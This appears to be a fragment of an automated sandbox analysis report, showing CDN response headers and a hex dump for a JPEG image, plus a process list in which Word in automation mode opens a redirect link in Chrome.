                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 9590
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 22eac681-c4d2-4391-8ab0-6df2d06fbb5d
                                                                                                                                                                                                                                                                Date: Wed, 24 Jul 2024 03:21:55 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 28 Mar 2024 15:24:12 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-707,/images/I/61kA0-m5lcL
                                                                                                                                                                                                                                                                Expires: Tue, 19 Jul 2044 03:21:55 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-707 /images/I/61kA0-m5lcL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 134cb849e01fafad6f264ff9633b073e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 496743
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ZGPh2rK3ppLmxx4MAw2C6CrVoKKMAIhCX-7F9ELQCiWGgDmYeiKELg==
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC9590INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 c8 00 8f 03 01 22 00 02 11 01 03 11 01 ff c4 00 b5 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 00 04 05 07 02 03 08 01 10 00 02 01 02 04 03 03 04 0d 0a 06 03 01 01 00 00 01 02 03 04 11 00 05 12 21 06 31 41 13 22 51 14 61 71 91 07 15 17 23 32 52 54 64 81 93 a1 d2 d3 16 33 42
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"!1A"Qaq#2RTd3B


                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:09:22:34
                                                                                                                                                                                                                                                                Start date:12/08/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                                                                                Imagebase:0x550000
                                                                                                                                                                                                                                                                File size:1'620'872 bytes
                                                                                                                                                                                                                                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                Start time:09:22:59
                                                                                                                                                                                                                                                                Start date:12/08/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://redirect.aecdaily.com/s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e
                                                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                Start time:09:22:59
                                                                                                                                                                                                                                                                Start date:12/08/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1816,i,3842482353412426924,4138602321115753140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                No disassembly